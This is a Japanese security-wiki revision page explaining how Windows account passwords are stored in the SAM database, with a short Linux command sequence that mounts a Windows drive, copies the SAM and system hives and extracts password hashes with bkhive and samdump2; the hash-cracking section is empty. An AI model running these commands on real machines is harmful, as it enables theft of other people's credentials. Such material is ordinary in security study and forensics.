「Windowsアカウントのパスワードをクラッキングする方法」の版間の差分

提供: セキュリティ
移動: 案内検索
(ページの作成:「<!-- vim: filetype=mediawiki --> __TOC__ == 概要 == Windowsパスワード については、 Windowsのパスワード をご参照ください...」)
 
行12: 行12:
 
[[Active Directory]]を使用していない場合、Windows アカウントのパスワードは、 [[SAMデータベース]] と呼ばれる C:\Windows\System32\config\SAM ファイルに[[暗号化]]されて格納されています。
 
[[Active Directory]]を使用していない場合、Windows アカウントのパスワードは、 [[SAMデータベース]] と呼ばれる C:\Windows\System32\config\SAM ファイルに[[暗号化]]されて格納されています。
  
[Windows]] アカウントの[[パスワード]]をクラッキングする方法は、いくつか存在します。
+
[[Windows]] アカウントの[[パスワード]]をクラッキングする方法は、いくつか存在します。
  
 
* [[SAMデータベース]] のファイルを入っているシステムドライブを他のOSからマウントし、 [[SAMデータベース]] を読み取る。
 
* [[SAMデータベース]] のファイルを入っているシステムドライブを他のOSからマウントし、 [[SAMデータベース]] を読み取る。

2013年4月13日 (土) 10:34時点における版


概要

Windowsパスワード については、 Windowsのパスワード をご参照ください。

Active Directoryを使用していない場合、Windows アカウントのパスワードは、 SAMデータベース と呼ばれる C:\Windows\System32\config\SAM ファイルに暗号化されて格納されています。

Windows アカウントのパスワードをクラッキングする方法は、いくつか存在します。

SAMデータベースのクラッキング

= Windows で SAMデータベースを抜き出す

以下のツールを用いて、パスワードハッシュを入手できます。

LinuxでSAMデータベースを抜き出す

以下は、bkhive を用いて、パスワードハッシュを取得する方法です。

mkdir /mnt/windows
mount /dev/hda1 /mnt/windows
cd /mnt/windows/WINDOWS/system32/config
cp SAM ~/
cp system ~/
cd ~/
bkhive system key
samedump2 ./system ./SAM > hashes.txt

パスワードハッシュのクラッキング

関連項目